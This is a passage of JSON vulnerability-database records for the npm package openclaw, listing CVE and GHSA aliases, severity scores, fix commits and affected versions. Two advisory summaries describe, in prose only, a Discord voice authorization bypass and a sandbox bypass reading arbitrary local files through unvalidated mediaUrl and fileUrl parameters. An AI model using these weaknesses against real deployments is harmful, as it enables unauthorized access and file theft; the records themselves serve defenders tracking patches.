                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41300",
                "GHSA-9f4w-67g7-mqwv"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-26kp-dbu2-pqej"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89601?format=api",
            "vulnerability_id": "VCID-26sg-e29u-hkf3",
            "summary": "OpenClaw: Discord voice ingress authorization can be bypassed via channel, name, and stale-role validation gaps\n## Summary\nDiscord voice ingress authorization can be bypassed via channel, name, and stale-role validation gaps\n\n## Current Maintainer Triage\n- Status: narrow\n- Assessment: Real in shipped v2026.3.28 Discord voice ingress, but impact is channel/member allowlist bypass rather than a broader critical auth break and mainline fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00\n\nOpenClaw thanks @cyjhhh for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41382",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10395",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10436",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10417",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41382"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:03Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x2m8-53h4-6hch",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:03Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x2m8-53h4-6hch"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41382",
                    "reference_id": "CVE-2026-41382",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41382"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-x2m8-53h4-6hch",
                    "reference_id": "GHSA-x2m8-53h4-6hch",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-x2m8-53h4-6hch"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-discord-voice-ingress-authorization-bypass-via-channel-and-role-validation-gaps",
                    "reference_id": "openclaw-discord-voice-ingress-authorization-bypass-via-channel-and-role-validation-gaps",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:03Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-discord-voice-ingress-authorization-bypass-via-channel-and-role-validation-gaps"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41382",
                "GHSA-x2m8-53h4-6hch"
            ],
            "risk_score": 2.5,
            "exploitability": "0.5",
            "weighted_severity": "4.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-26sg-e29u-hkf3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91252?format=api",
            "vulnerability_id": "VCID-26sv-grsd-abcw",
            "summary": "Duplicate Advisory: OpenClaw's message tool media parameter bypasses tool policy filesystem isolation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-v8wv-jg3q-qwpq. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.24 contains a sandbox bypass vulnerability in the message tool that allows attackers to read arbitrary local files by using mediaUrl and fileUrl alias parameters that bypass localRoots validation. Remote attackers can exploit this by routing file requests through unvalidated alias parameters to access files outside the intended sandbox directory.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33581",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33581"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3gr8-2752-h46q",
                    "reference_id": "GHSA-3gr8-2752-h46q",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3gr8-2752-h46q"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.24",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
